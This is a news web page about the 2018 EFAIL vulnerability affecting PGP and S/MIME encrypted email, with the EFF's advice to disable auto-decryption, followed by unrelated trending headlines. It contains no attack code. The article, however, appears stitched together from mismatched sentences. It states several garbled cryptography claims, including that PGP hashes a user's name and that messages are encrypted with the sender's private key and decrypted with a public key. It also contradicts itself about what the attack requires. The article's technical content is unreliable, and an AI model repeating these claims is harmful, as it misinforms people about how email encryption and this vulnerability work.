January 23, 2019

Popular encrypted email standards are unsafe

14 May 2018, 07:12 | Cameron Gross

Uninstall PGP: EFF warns of exploit that may reveal plaintext of encrypted emails

Computer encryption

Security experts are warning PGP users to disable tools that automatically decrypt PGP-encrypted email after the discovery of a critical vulnerability which could help attackers read protected emails.

The researchers meant to hold off on full publication until Tuesday, May 15, though the white paper was published earlier due to the embargo being broken. The digital privacy watchdog also suggested the use of alternatives, such as Signal, for the time being as the implications of the vulnerabilities described in the paper are better understood, and hopefully mitigated, by the cybersecurity community.

The use of PGP for secure communications has been advocated, among others, by Edward Snowden, who blew the whistle on pervasive electronic surveillance at the US National Security Agency before fleeing to Russian Federation.

Sebastian Schinzel, professor of computer science at Münster University investigated the flaw, tweeting that full details of the vulnerability will be available from 15 May.

PGP uses an algorithm to generate a "hash", or mathematical summary, of a user's name and other information.

European researchers have found that the popular PGP and S/MIME email encryption standards are vulnerable to being hacked, leading them to urge people to disable and uninstall them immediately.

By comparison, the Gadget Attack affects a much wider variety of mail clients, including Microsoft's Outlook, but ranges in efficacy based on whether it's used against PGP or S/MIME encryption.

"EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs".

"They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", researchers said.

The attack relies on contacting the same person that sent the encrypted email in the first place.

While the requirement that attackers have access to previously sent e-mails is a an extremely high bar, the entire objective of both PGP and S/MIME is to protect users against this possibility.

UPDATE 2: Because some researchers started disclosing details about the vulnerability ahead of schedule, the website is now live, along with the research paper, both containing more info on the EFAIL vulnerability. This is then encrypted with the sender's private "key" and decrypted by the receiver using a separate public key. However, the researchers have confirmed the exploitable vulnerabilities only exist for email users. PGP and S/MIME are said to have flaws that could be exploited to get access to any incoming or outgoing emails on platforms that use either of the two encryption tools.

Other News

Trending Now

Jerusalem mufti calls for protests against United States embassy relocation
Last December the president broke with decades of USA policy and chose to move the American embassy from Tel Aviv to Jerusalem. Sullivan is leading the USA delegation in the absence of Trump, Vice President Mike Pence and Secretary of State Mike Pompeo.

A Marvel Fan Already Knows How The MCU Can Introduce Ms. Marvel
The character got her very own Marvel series back in 2014, and has been something of a fan favorite ever since. Responding to a tweet about Kamala Khan's potential MCU debut, fans immediately started casting the role.

Tesla, probably on autopilot, slams into truck in dramatic Utah wreck
Police in South Jordan, Utah are investigating if a Tesla Model S crashed into a fire truck while running on autopilot. Police say the driver of the UFA truck was not injured and left later in the same truck.

Philippine Supreme Court Ousts Top Judge Critical of Duterte Government
Six of Sereno's fellow justices testified against her in the hearings that started in September, exposing rifts in the high court. Lourdes Sereno did not play a factor in his decision to side with the majority 8-6 vote upholding the quo warranto petition.

New Jersey's long road to legalizing sports gambling
Congress can regulate sports gambling directly, but if it elects not to do so, each state is free to act on its own. Trump's administration was on the opposite side of the case, opposing the New Jersey law championed by Christie.

Karnataka elections: Siddaramaiah fuels rumours of a possible Congress-JD(S) alliance
Second, farm distress has become a political issue and the rural-urban stratification of the Karnataka vote will be important. Shashi Tharoo, the Congress MP from Kerala said he was optimistic of party retaining power in Karnataka.

TMC workers barring voters from casting votes
Minister and local Trinamool MLA Mantu Pakhira denied the allegation and said the fire may have been caused by short circuit. The court in its order stated that any loss of life or damage to property has to be compensated by the state government.

Indian curriculum ICSE results released today
The declaration of the ICSE and ISC results will seal the fate of lakhs of students who have appeared for the examination. In terms of regions, the southern region recorded the highest pass percentage in Class 12 at 98.38 percent.

Mumbai Indians vs Rajasthan Royals
Suryakumar Yadav has been in good form and is giving Mumbai Indians a solid start time and again but he needs support from Lewis. For Hindi commentary tune into Star Sports Hindi and HD. "So, you got to learn some variations, you got to get smart".

Nintendo Announces Re-Stock of NES Classic Edition This June
Tracking down a Nintendo and purchasing all the games that were included in the NES Classic would cost hundreds of dollars. You can play two-player games by getting a second or using a Wii Classic Controller/Classic Controller Pro.